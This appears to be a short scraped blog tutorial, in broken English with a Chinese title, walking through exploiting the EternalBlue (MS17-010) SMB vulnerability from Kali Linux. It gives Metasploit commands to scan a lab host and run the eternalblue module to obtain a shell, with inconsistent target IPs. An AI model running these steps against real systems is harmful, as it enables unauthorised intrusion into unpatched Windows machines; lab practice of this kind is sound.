zoukankan      html  css  js  c++  java
  • Kali Linux下利用永恒之蓝漏洞发起攻击获取Shell

    Material:

            Computer 

            VMware 12

            Kali Linux.ISO

            Internet

    First:

        Open Your Computer and VMware:

    VMware Of KaliSecond Open Your SSH Connection Tools, Eg Securt CRT,Putty.......

    Input Msfconsole On Your Tools,

    Let's Wait For Him To Be Successful...............

    Ok,Screen Picture :

    Msfconsole


    Then We Input use auxiliary/scanner/smb/smb_ms17_010

                             Show options

    Set The Target Host IP Or IP Segment That You Need To Attack , Scan Them Leak ,And Know What Work Load Is Needed

                   My Attack Host Is 192.168.10.100 . This Is a Computer_Phone  Server

    Input : set rhosts 192.168.10.10    (  Attacted IP  )            

               Exploit


    Attack


    If The Interface Is Like This ,  It Means There Is A Vulnerability,

    So ,Let's Attack This Host.

    Input : use exploit/windows/smb/ms17_010_eternalblue

               show options

                set rhost 192.168.10.100

               Exploit    

     



    Successful Attack Host And Get Shell !!!!!!!!!

                

                

                                                                                                                                英文水平有限,兄弟们就将就讲究吧

  • 相关阅读:
    windows上设置代理
    docker 代理
    windbg随笔
    win10自带ssh server使用
    centos7 最小安装后,编译配置redsocks
    cef chromium 编译
    C++中的单例模式
    delete NULL
    音视频通讯能力提供商
    云视频会议解决方案
  • 原文地址:https://www.cnblogs.com/chk141/p/12220324.html
Copyright © 2011-2022 走看看